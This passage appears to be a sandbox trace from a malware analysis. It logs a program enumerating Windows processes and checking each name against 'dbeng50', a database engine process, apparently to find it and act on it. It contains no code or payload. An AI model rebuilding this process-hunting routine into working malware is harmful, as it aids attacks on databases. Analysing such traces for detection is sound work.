lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0095.932] StrStrIA (lpFirst="csrss.exe", lpSrch="dbeng50") returned 0x0 [0095.932] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0095.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.933] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3574028 [0095.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3574028, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0095.933] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0095.934] StrStrIA (lpFirst="winlogon.exe", lpSrch="dbeng50") returned 0x0 [0095.934] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0095.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.935] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35741a8 [0095.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x35741a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0095.935] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0095.935] StrStrIA (lpFirst="services.exe", lpSrch="dbeng50") returned 0x0 [0095.935] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0095.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.936] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35741f0 [0095.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x35741f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0095.936] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0095.936] StrStrIA (lpFirst="lsass.exe", lpSrch="dbeng50") returned 0x0 [0095.936] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.937] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574100 [0095.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3574100, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.937] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.937] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.937] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0095.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.938] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35741d8 [0095.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35741d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0095.938] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0095.938] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="dbeng50") returned 0x0 [0095.938] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0095.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.939] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3574250 [0095.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3574250, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0095.939] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0095.940] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="dbeng50") returned 0x0 [0095.940] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.942] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574040 [0095.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3574040, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.942] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.942] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.942] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0095.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.943] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574d10 [0095.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3574d10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0095.943] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0095.943] StrStrIA (lpFirst="dwm.exe", lpSrch="dbeng50") returned 0x0 [0095.944] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.945] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573f80 [0095.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573f80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.945] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.945] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.945] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.946] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573fe0 [0095.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573fe0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.946] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.946] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.946] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.947] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574190 [0095.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3574190, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.947] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.948] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.948] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.949] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574148 [0095.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3574148, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.949] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.949] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.949] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.950] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574268 [0095.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3574268, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.950] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.950] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.950] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.951] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574118 [0095.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3574118, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.951] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.951] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.951] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.953] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573ff8 [0095.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573ff8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.953] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.953] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.953] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.954] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573f98 [0095.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573f98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.954] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.954] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.954] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.956] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574058 [0095.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3574058, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.956] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.956] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.956] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.957] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574178 [0095.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3574178, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.957] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.957] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.957] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0095.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.959] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574130 [0095.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3574130, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0095.959] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0095.959] StrStrIA (lpFirst="spoolsv.exe", lpSrch="dbeng50") returned 0x0 [0095.959] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.960] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574220 [0095.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3574220, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.960] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.960] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.960] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0095.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.961] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574238 [0095.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3574238, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0095.961] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0095.961] StrStrIA (lpFirst="audiodg.exe", lpSrch="dbeng50") returned 0x0 [0095.961] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0095.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.963] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3574070 [0095.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3574070, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0095.963] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0095.963] StrStrIA (lpFirst="sihost.exe", lpSrch="dbeng50") returned 0x0 [0095.963] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.964] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573fb0 [0095.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573fb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.964] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.964] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0095.964] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, 